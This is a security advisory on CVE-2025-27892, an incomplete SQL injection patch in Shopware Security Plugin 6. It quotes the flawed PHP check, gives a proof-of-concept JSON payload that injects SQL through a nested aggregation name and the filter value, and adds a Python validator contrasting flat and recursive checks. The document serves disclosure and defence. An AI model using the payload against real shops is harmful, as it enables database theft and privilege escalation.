Shopware Unfixed SQL Injection in Security Plugin 6
Older Shopware versions are affected by a known SQL injection that is fixed in newer Shopware releases. For customers who cannot upgrade the main Shopware version, Shopware AG offers the Security Plugin, which patches known vulnerabilities in old Shopware versions. The plugin's patch for this SQL injection is incomplete.
Details
- Product: Shopware Security Plugin 6
- Affected Versions: Shopware Security Plugin 6 2.0.10 (Shopware < 6.5.8.13, < 6.6.5.1)
- Fixed Versions: Shopware Security Plugin 6 2.0.11, or Shopware 6.6.5.1 or 6.5.8.13
- Vulnerability Type: SQL injection
- Security Risk: medium
- Vendor URL: https://www.shopware.com
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2025-001
- GitHub Advisory URL: https://github.com/shopware/shopware/security/advisories/GHSA-8g35-7rmw-7f59
- Advisory Status: published
- CVE: CVE-2025-27892
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27892
- Previous CVEs: CVE-2024-22406, CVE-2024-42357
- Shopware Security Plugin: https://store.shopware.com/en/swag136939272659f/shopware-6-security-plugin.html
Introduction
If a security gap appears, it can quickly be closed and protected with an update. However, not every online shop has the ability to immediately update its own system to a new version. Often, other processes or systems are connected to the shop, which requires a specific plan for an update. With this plugin, we offer a solution to quickly and easily secure your online shop despite these limitations. The Security plugin for Shopware 6 includes security-related fixes that can be applied to your Shopware environment through a straightforward plugin update.
(from vendor’s homepage)
More Details
Shopware prior to version 6.5.8.13 is affected by a SQL injection vulnerability (CVE-2024-22406 and CVE-2024-42357). Shopware provides the Security Plugin which should fix those vulnerabilities retrospectively in older Shopware versions. In the case of this SQL injection vulnerability this fix is incomplete. This leads to the vulnerability still being exploitable in Shopware versions prior to 6.5.8.13 even with the latest Security Plugin for that version installed.
The known vulnerability can be found in the aggregations field. This field is used, for example, at the /api/search/order endpoint. A possible search could look like the following:
    POST /api/search/order HTTP/1.1
    Host: example.com
    Content-Type: application/json
    Authorization: Bearer [...]

    {
      "filter": [
        {
          "type": "equals",
          "field": "transactions.stateMachineState.technicalName",
          "value": "paid"
        }
      ],
      "aggregations": [
        {
          "type": "histogram",
          "name": "order_sum_bucket",
          "field": "orderDateTime",
          "interval": "day",
          "aggregation": {
            "type": "sum",
            "name": "totalAmount",
            "field": "amountTotal"
          }
        }
      ]
    }
While the security plugin patches the vulnerability in the name field of the aggregations object, it does not sanitize the nested aggregation objects, which can be used recursively, as can be seen in the following code snippet of the fix in the security plugin:
    class PatchedAggregationParser extends AggregationParser
    {
        public function buildAggregations(EntityDefinition $definition, array $payload, Criteria $criteria, SearchRequestException $searchRequestException): void
        {
            parent::buildAggregations($definition, $payload, $criteria, $searchRequestException);

            // Only the top-level aggregations are inspected here; a nested
            // "aggregation" object inside one of them is never visited.
            foreach ($criteria->getAggregations() as $i => $aggregation) {
                if (str_contains($aggregation->getName(), '?') || str_contains($aggregation->getName(), ':')) {
                    $searchRequestException->add(new InvalidAggregationQueryException('Invalid aggregation name'), '/aggregations/' . $i);
                }
            }
        }
    }
The foreach loop only checks the topmost name field of the aggregations. This leads to attackers being able to inject symbols like ? or : in the name field of the nested aggregation object, which are normally reserved for prepared statement placeholders.
Proof of Concept
Attackers can exploit this by inserting ? into the mentioned field. Additionally, the value field of the filter object is used as a variable that is bound to the prepared statement. This value can then be used to inject arbitrary SQL statements. An example payload could look like the following:
    {
      "filter": [
        {
          "type": "equals",
          "field": "transactions.stateMachineState.technicalName",
          "value": "paid` FROM `order`; SELECT SLEEP(5); --"
        }
      ],
      "aggregations": [
        {
          "type": "histogram",
          "name": "order_sum_bucket",
          "field": "orderDateTime",
          "interval": "day",
          "aggregation": {
            "type": "sum",
            "name": "totalAmount ? ? --",
            "field": "amountTotal"
          }
        }
      ]
    }
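The following example, added here and not taken from the advisory, Shopware or the Security Plugin, contrasts the plugin's flat check with a recursive one. It parses the benign search request and the proof-of-concept payload shown above, applies the plugin's rule (reject a name containing ? or :) once only to the top-level names and once to every nested aggregation object, and reports the path of each rejected name. The function and constant names are our own; the payloads are constructed from the two request bodies quoted in this advisory.

```python
"""Flat versus recursive validation of Shopware-style "aggregations" payloads.

Added example (not project code). It reproduces the plugin's rejection rule
for aggregation names and shows why checking only the top level is not
enough: the nested "aggregation" object carries its own "name".
"""
import json

# Characters the plugin rejects in an aggregation name (see the PHP snippet).
FORBIDDEN = ("?", ":")

# Constructed from the benign request body quoted in the advisory.
BENIGN_PAYLOAD = json.loads("""
{
  "filter": [
    {"type": "equals", "field": "transactions.stateMachineState.technicalName", "value": "paid"}
  ],
  "aggregations": [
    {
      "type": "histogram", "name": "order_sum_bucket", "field": "orderDateTime", "interval": "day",
      "aggregation": {"type": "sum", "name": "totalAmount", "field": "amountTotal"}
    }
  ]
}
""")

# Constructed from the proof-of-concept body quoted in the advisory.
MALICIOUS_PAYLOAD = json.loads("""
{
  "filter": [
    {"type": "equals", "field": "transactions.stateMachineState.technicalName",
     "value": "paid` FROM `order`; SELECT SLEEP(5); --"}
  ],
  "aggregations": [
    {
      "type": "histogram", "name": "order_sum_bucket", "field": "orderDateTime", "interval": "day",
      "aggregation": {"type": "sum", "name": "totalAmount ? ? --", "field": "amountTotal"}
    }
  ]
}
""")


def _name_is_invalid(aggregation: dict) -> bool:
    """Apply the plugin's rule to one aggregation object's "name" field."""
    name = str(aggregation.get("name", ""))
    return any(ch in name for ch in FORBIDDEN)


def flat_check(payload: dict) -> list[str]:
    """Mirror the plugin's loop: inspect only the top-level aggregation names.

    Returns the JSON-pointer-style paths of rejected aggregations.
    """
    errors = []
    for i, aggregation in enumerate(payload.get("aggregations", [])):
        if isinstance(aggregation, dict) and _name_is_invalid(aggregation):
            errors.append(f"/aggregations/{i}")
    return errors


def recursive_check(payload: dict) -> list[str]:
    """Inspect every aggregation name, descending into nested "aggregation" objects.

    Returns the JSON-pointer-style paths of rejected aggregations, so the
    nested name in the proof of concept is reported as
    "/aggregations/0/aggregation".
    """
    errors = []

    def walk(aggregation: dict, path: str) -> None:
        if _name_is_invalid(aggregation):
            errors.append(path)
        nested = aggregation.get("aggregation")
        if isinstance(nested, dict):
            walk(nested, path + "/aggregation")

    for i, aggregation in enumerate(payload.get("aggregations", [])):
        if isinstance(aggregation, dict):
            walk(aggregation, f"/aggregations/{i}")
    return errors


if __name__ == "__main__":
    for label, payload in (("benign", BENIGN_PAYLOAD), ("poc", MALICIOUS_PAYLOAD)):
        print(label, "flat:", flat_check(payload), "recursive:", recursive_check(payload))
```

Run stand-alone, the script shows the flat check accepting both bodies while the recursive check rejects the proof-of-concept body at /aggregations/0/aggregation. The same recursive walk can be run over captured request bodies from the API logs to find requests that reached an unpatched instance.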
Fix
An update to Shopware version 6.5.8.13 fixes the vulnerability independently of the security plugin. For older versions, apply update 2.0.11 for the Shopware Security Plugin 6.
Security Risk
Attackers with access to the Shopware Store API or Admin API are able to use an SQL injection vulnerability in order to access the database with read and write permissions. This access can be used to disclose information or escalate privileges.
The risk varies depending on which users have access to the Shopware APIs. If attackers have access to a user in the Shopware backend, even one with low privileges, attackers could escalate their privileges and compromise the database, which is rated as a medium risk. If the search-related endpoints of the Store API are exposed, this vulnerability poses a high risk, as any user with access could exploit the vulnerability to compromise the database.
Timeline
- 2025-02-12 Vulnerability identified
- 2025-02-17 Customer approved disclosure to vendor
- 2025-02-17 CVE ID requested
- 2025-02-24 Vendor notified
- 2025-03-07 Vendor asked for review of fix
- 2025-03-10 Approved the fix
- 2025-03-21 Asked vendor for update
- 2025-04-07 Asked vendor for update
- 2025-04-08 Vendor published advisory and fix
- 2025-04-08 Advisory published
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/